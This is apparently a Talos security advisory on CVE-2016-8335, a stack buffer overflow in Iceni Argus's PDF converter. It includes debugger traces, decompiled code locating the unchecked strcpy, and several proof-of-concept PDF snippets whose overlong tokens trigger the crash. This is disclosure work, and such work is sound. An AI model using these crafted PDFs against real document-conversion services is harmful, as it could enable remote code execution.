CVE-2016-8335
An exploitable stack based buffer overflow vulnerability exists in the ipNameAdd functionality of Iceni Argus. A specially crafted pdf file can cause a buffer overflow resulting in arbitrary code execution. An attacker can send/provide malicious pdf file to trigger this vulnerability.
Iceni Argus Version 6.6.04 (Sep 7 2012) NK - Linux x64
Iceni Argus Version 6.6.04 (Nov 14 2014) NK - Windows x64
http://www.iceni.com/legacy.htm
8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVSSv3 Calculator: https://www.first.org/cvss/calculator/3.0
This vulnerability is present in the Iceni Argus PDF which is used inter alia to convert pdf files to (x)html form. This product is mainly used by MarkLogic for pdf document conversions as part of their web based document search and rendering. A specially crafted PDF file can lead to an stack based buffer overflow and ultimately to remote code execution.
Let's investigate this vulnerability. After execution of the PDF to html converter with a malformed pdf file as an input we can easily observe in gdb that the return address of a function has been overwritten:
gdb-peda$ r
Starting program: /home/icewall/bugs/cvtpdf/convert config
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Loading configuration...
Parsing macros...
Macro synth-bookmarks='true'
Macro image-output='true'
Macro text-output='true'
Macro zones='false'
Macro ignore-text='true'
Macro remove-overprint='false'
Macro illustrations='true'
Macro line-breaks='true'
Macro image-quality='75'
Macro page-start=''
Macro page-end=''
Macro document-start=''
Macro document-end=''
features='11140221'
Processing...
*** stack smashing detected ***: /home/icewall/bugs/cvtpdf/convert terminated
Program received signal SIGABRT, Aborted.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x6c23 ('#l')
ECX: 0x6c23 ('#l')
EDX: 0x6
ESI: 0x4e ('N')
EDI: 0xf7f0c000 --> 0x1aada8
EBP: 0xfffc69cc --> 0xf7ec4443 ("stack smashing detected")
ESP: 0xfffc6758 --> 0xfffc69cc --> 0xf7ec4443 ("stack smashing detected")
EIP: 0xf7fdace0 (pop ebp)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7fdacdc: nop
0xf7fdacdd: nop
0xf7fdacde: int 0x80
=> 0xf7fdace0: pop ebp
0xf7fdace1: pop edx
0xf7fdace2: pop ecx
0xf7fdace3: ret
0xf7fdace4: int3
[------------------------------------stack-------------------------------------]
0000| 0xfffc6758 --> 0xfffc69cc --> 0xf7ec4443 ("stack smashing detected")
0004| 0xfffc675c --> 0x6
0008| 0xfffc6760 --> 0x6c23 ('#l')
0012| 0xfffc6764 --> 0xf7d8f687 (xchg ebx,edi)
0016| 0xfffc6768 --> 0xf7f0c000 --> 0x1aada8
0020| 0xfffc676c --> 0xfffc6808 --> 0x10
0024| 0xfffc6770 --> 0xf7d92ab3 (mov edx,DWORD PTR gs:0x8)
0028| 0xfffc6774 --> 0x6
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGABRT
0xf7fdace0 in ?? ()
As we can see above, the stack buffer protection mechanism got triggered which means that the return address indeed has been corrupted. Checking call stack :
gdb-peda$ bt 10
#0 0xf7fdace0 in ?? ()
#1 0xf7e5cb8b in __GI___fortify_fail (msg=<optimized out>, msg@entry=0xf7ec4443 "stack smashing detected") at fortify_fail.c:38
#2 0xf7e5cb1a in __stack_chk_fail () at stack_chk_fail.c:28
#3 0x0839aef4 in __stack_chk_fail_local ()
#4 0x080d3764 in ipNameAdd ()
#5 0x6d303062 in ?? ()
#6 0x6d303062 in ?? ()
#7 0x6d303062 in ?? ()
#8 0x6d303062 in ?? ()
#9 0x6d303062 in ?? ()
(More stack frames follow...)
shows that function where overflow occured is ipNameAdd
.
Using rr debugger we can easily return to this function when overflow took place and investigate important details:
(rr) b ipNameAdd
Breakpoint 1 at 0x80d36a9
(rr) rc
Continuing.
Breakpoint 1, 0x080d36a9 in ipNameAdd ()
(rr) context
$5 = 0x6c97
[----------------------------------registers-----------------------------------]
EAX: 0xb3c7298 ("b00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00m"...)
EBX: 0x8f58750 --> 0x8f57ef0 --> 0x1
ECX: 0x30 ('0')
EDX: 0x839f6ea --> 0x64002a62 ('b*')
ESI: 0xa ('\n')
EDI: 0x0
EBP: 0xfff43f68 --> 0xfff43fd8 --> 0xfff44008 --> 0xfff44078 --> 0xfff440a8 --> 0xfff440c8 --> 0xfff44118 --> 0xfff44148 --> 0xfff44218 --> 0xfff44278 --> 0xfff44298 --> 0xfff7a448 --> 0x0
ESP: 0xfff43e40 --> 0xb380370 --> 0x0
EIP: 0x80d36a9 --> 0xe8f45d89
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80d36a0 <ipNameAdd>: push ebp
0x80d36a1 <ipNameAdd+1>: mov ebp,esp
0x80d36a3: sub esp,0x128
=> 0x80d36a9: mov DWORD PTR [ebp-0xc],ebx
0x80d36ac: call 0x8050f3f <__i686.get_pc_thunk.bx>
0x80d36b1: add ebx,0xe8509f
0x80d36b7: mov DWORD PTR [ebp-0x4],edi
0x80d36ba: mov edi,DWORD PTR [ebp+0x8]
[------------------------------------stack-------------------------------------]
0000| 0xfff43e40 --> 0xb380370 --> 0x0
0004| 0xfff43e44 --> 0xb37f068 --> 0xb37fa04 --> 0xb37f1a4 --> 0xb37f8f8 --> 0xb37f6e0 --> 0x0
0008| 0xfff43e48 --> 0xfff43e60 --> 0x3
0012| 0xfff43e4c --> 0x0
0016| 0xfff43e50 --> 0x3
0020| 0xfff43e54 --> 0xf754c02a --> 0x4245c8b
0024| 0xfff43e58 ("MAGIC")
0028| 0xfff43e5c --> 0x670043 ('C')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
We are now at the beginning of the ipNameAdd
function before the overflow took place. We can see that call stack is not corrupted:
(rr) bt
#0 0x080d36bd in ipNameAdd ()
#1 0x080ee0bd in ipDocExecStack ()
#2 0x080b6ed3 in ipStreamParse ()
#3 0x0809e02e in _ObjResolveMem ()
#4 0x0809e191 in ipObjResolveMem ()
#5 0x0809e276 in ipObjResolve ()
#6 0x080914d4 in ipDocCreate ()
#7 0x0806c371 in _icnDocCreate ()
#8 0x08054580 in dumpFile ()
#9 0x080548e7 in dumpCommandLine ()
#10 0x08052111 in icnArgusExtract ()
#11 0x08050566 in main ()
#12 0xf7479af3 in __libc_start_main (main=0x804fe00 <main>, argc=0x2, argv=0xfff7a4e4, init=0x839ae00 <__libc_csu_init>,
fini=0x839adf0 <__libc_csu_fini>, rtld_fini=0xf7715160 <_dl_fini>, stack_end=0xfff7a4dc) at libc-start.c:287
#13 0x0804fd61 in _start ()
Before we step a couple instructions further, let’s take a glance at the representation of the ipNameAdd
function in pseudo-code to understand the bigger picture:
Line 1 int __cdecl ipNameAdd(char *src)
Line 2 {
Line 3 int v1; // esi@1
Line 4 int result; // eax@2
Line 5 int v3; // eax@5
Line 6 int v4; // esi@7
Line 7 char v5; // [esp+Ch] [ebp-11Ch]@1
Line 8 char dest[255]; // [esp+18h] [ebp-110h]@1
Line 9 int v7; // [esp+118h] [ebp-10h]@1
Line 10
Line 11 v7 = *MK_FP(__GS__, 20);
Line 12 strcpy(dest, src);
Line 13 v1 = rbtree_lookup(&v5, ipd[365]);
Line 14 if ( strlen(src) > 0xFF )
Line 15 {
Line 16 v3 = ipGStrGetStr("ipnametree.c", 0, "Name too long");
Line 17 icnErrorSet(28, v3);
Line 18 result = 0;
Line 19 }
Line 20 else
Line 21 {
Line 22 result = v1;
Line 23 if ( !v1 )
Line 24 {
Line 25 v4 = icnChainAlloc(ipd[934], 268);
Line 26 result = 0;
Line 27 if ( v4 )
Line 28 {
Line 29 *v4 = 0;
Line 30 *(v4 + 4) = 0;
Line 31 *(v4 + 8) = 0;
Line 32 strcpy((v4 + 12), src);
Line 33 rbtree_insert(v4, ipd[365]);
Line 34 result = v4;
Line 35 }
Line 36 }
Line 37 }
Line 38 if ( *MK_FP(__GS__, 20) != v7 )
Line 39 _stack_chk_fail_local();
Line 40 return result;
Line 41}
From this pseudo-code we can immediately spot the vulnerability: at line 12 just at the beginning of function,
the argument src
is passed directly to strcpy
function without any checks.
The string length check for src
is done at line 14, AFTER the strcpy
call. We can also see at line 8 that the dst
buffer can hold up to 255 characters, so a
string longer than 255 characters will cause a buffer overflow.
Our next step is to figure out what part of the PDF document the src
string is coming from.
When we see part of document where the vulnerable string is located it looks like this:
%PDF-1.4
1 0 obj
<</Type /Catalog
/Pages 2 0 R
/MAGIC b00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00m
>>
endobj
(...)
In this example the b00m
string is located inside the dictionary as a value for key(Object name) /Magic
.
But what type of object it is ? String ? Int ? Float ? …?
It turns out none of them and that is what is causing the problem. To observe it we need to take a glance one function above on call stack which is ipDocExecStack
.
This function is inter alia responsible of parsing tokens
/strings
from pdf document and convert them into proper objects.
Line 1 if ( *v8 == '/' )
Line 2 {
Line 3 if ( strlen(v8) - 1 > 0xFF )
Line 4 {
Line 5 v13 = 0;
Line 6 v64 = ipGStrGetStr("ipscan.c", 1, "Name too long '%s'");
Line 7 icnErrorSet(12, v64, token);
Line 8 return v13;
Line 9 }
Line 10 *&v76 = COERCE_FLOAT(ipNameAdd(token + 1));
Line 11 if ( *&v76 == 0.0 )
Line 12 return 0;
Line 13 LOBYTE(v12) = 2;
Line 14 LOBYTE(objNumber) = 2;
Line 15 goto LABEL_20;
Line 16 }
Line 17 if ( v10 != '(' )
Line 18 {
Line 19 if ( v10 == '<' && token[v9 - 1] == '>' )
Line 20 {
Line 21 *&v76 = COERCE_FLOAT(ipStringCreateHex(a1->dword238, token + 1, v9 - 2));
Line 22 if ( *&v76 == 0.0 )
Line 23 return 0;
Line 24 goto LABEL_131;
Line 25 }
Line 26LABEL_18:
Line 27 if ( isReal(token) )
Line 28 {
Line 29 v11 = strtod(token, 0);
Line 30 LOBYTE(v12) = 6;
Line 31 LOBYTE(objNumber) = 6;
Line 32 *&v76 = v11;
Line 33 goto LABEL_20;
Line 34 }
Line 35 if ( !isInteger(token) )
Line 36 {
Line 37 v12 = COERCE_FLOAT(ipKeywordFind(token));
Line 38 LOBYTE(objNumber) = -117;
Line 39 *&v76 = v12;
Line 40 v54 = v12;
Line 41 LOBYTE(v12) = -117;
Line 42 if ( v54 != 0.0 )
Line 43 goto LABEL_20;
Line 44 v55 = ipNameAdd(token);
As you can see there are checks and conversions to Name object
line 1-16, Hex string
line 19-25, Real number
line 27-34 and a check
whether token
is an integer at line 35. If all these checks fail we end up at line 44 and token
is converted into a Name object
. No length checks
for token
are done in that case. The only scenario where token
length is checked before passing it to ipNameAdd
is when token
is in a “regular” Name object
representation starting with “/”, line 1-3.
If an attacker creates a token
that is not a “regular” Name object
, it will cause a stack based buffer overflow which can result in arbitrary code execution.
Of course that string can appear in different places in the pdf document. Above we saw an example for dictionary key value, but we can also trigger the vulnerble
part of code if it’s array
element:
%PDF-1.4
1 0 obj
<</Type /Catalog
/Pages 2 0 R
[ b00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00m ]
>>
endobj
or stream
content :
%PDF-1.4
1 0 obj
<</Type /Catalog
/Pages 2 0 R
>>
stream
b00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00m
endstream
endobj
Limitations related with characters of that string are following. It can contain characters in range [0x21-0xff] without 0x80.
Loading configuration...
Parsing macros...
Macro synth-bookmarks='true'
Macro image-output='true'
Macro text-output='true'
Macro zones='false'
Macro ignore-text='true'
Macro remove-overprint='false'
Macro illustrations='true'
Macro line-breaks='true'
Macro image-quality='75'
Macro page-start=''
Macro page-end=''
Macro document-start=''
Macro document-end=''
features='11140221'
Processing...
*** stack smashing detected ***: /home/icewall/bugs/cvtpdf/convert terminated
Program received signal SIGABRT, Aborted.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x9543
ECX: 0x9543
EDX: 0x6
ESI: 0x4e ('N')
EDI: 0xf7f0c000 --> 0x1aada8
EBP: 0xfffc69fc --> 0xf7ec4443 ("stack smashing detected")
ESP: 0xfffc6788 --> 0xfffc69fc --> 0xf7ec4443 ("stack smashing detected")
EIP: 0xf7fdace0 (pop ebp)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7fdacdc: nop
0xf7fdacdd: nop
0xf7fdacde: int 0x80
=> 0xf7fdace0: pop ebp
0xf7fdace1: pop edx
0xf7fdace2: pop ecx
0xf7fdace3: ret
0xf7fdace4: int3
[------------------------------------stack-------------------------------------]
0000| 0xfffc6788 --> 0xfffc69fc --> 0xf7ec4443 ("stack smashing detected")
0004| 0xfffc678c --> 0x6
0008| 0xfffc6790 --> 0x9543
0012| 0xfffc6794 --> 0xf7d8f687 (xchg ebx,edi)
0016| 0xfffc6798 --> 0xf7f0c000 --> 0x1aada8
0020| 0xfffc679c --> 0xfffc6838 --> 0x10
0024| 0xfffc67a0 --> 0xf7d92ab3 (mov edx,DWORD PTR gs:0x8)
0028| 0xfffc67a4 --> 0x6
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGABRT
0xf7fdace0 in ?? ()
gdb-peda$ exploitable
Description: Stack buffer overflow
Short description: StackBufferOverflow (6/22)
Hash: 3f1428af0cd8ba50f2c4e1b578aa9cfa.ced4f58c0fadf0cd3623dac81e94f776
Exploitability Classification: EXPLOITABLE
Explanation: The target stopped while handling a signal that was generated by libc due to detection of a stack buffer overflow. Stack buffer overflows are generally considered exploitable.
Other tags: PossibleStackCorruption (7/22), AbortSignal (20/22)
gdb-peda$ exploitable -m
EXCEPTION_FAULTING_ADDRESS:0x00000000009543
EXCEPTION_CODE:0x6
FAULTING_INSTRUCTION:pop ebp
MAJOR_HASH:3f1428af0cd8ba50f2c4e1b578aa9cfa
MINOR_HASH:ced4f58c0fadf0cd3623dac81e94f776
STACK_DEPTH:14
STACK_FRAME:[vdso]+0x0
STACK_FRAME:/lib/i386-linux-gnu/libc-2.19.so!__GI___fortify_fail+0x0
STACK_FRAME:/lib/i386-linux-gnu/libc-2.19.so!__stack_chk_fail+0x0
STACK_FRAME:/home/icewall/bugs/cvtpdf/convert!__stack_chk_fail_local+0x0
STACK_FRAME:/home/icewall/bugs/cvtpdf/convert!ipNameAdd+0x0
STACK_FRAME:Unknown+0x0
STACK_FRAME:Unknown+0x0
STACK_FRAME:Unknown+0x0
STACK_FRAME:Unknown+0x0
STACK_FRAME:Unknown+0x0
STACK_FRAME:Unknown+0x0
STACK_FRAME:Unknown+0x0
STACK_FRAME:Unknown+0x0
STACK_FRAME:/home/icewall/bugs/cvtpdf/convert+0x0
INSTRUCTION_ADDRESS:0x000000f7fdace0
INVOKING_STACK_FRAME:0
DESCRIPTION:Stack buffer overflow
SHORT_DESCRIPTION:StackBufferOverflow (6/22)
OTHER_RULES:PossibleStackCorruption (7/22), AbortSignal (20/22)
CLASSIFICATION:EXPLOITABLE
EXPLANATION:The target stopped while handling a signal that was generated by libc due to detection of a stack buffer overflow. Stack buffer overflows are generally considered exploitable.
2016-09-06 - Vendor Disclosure
2016-10-14 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.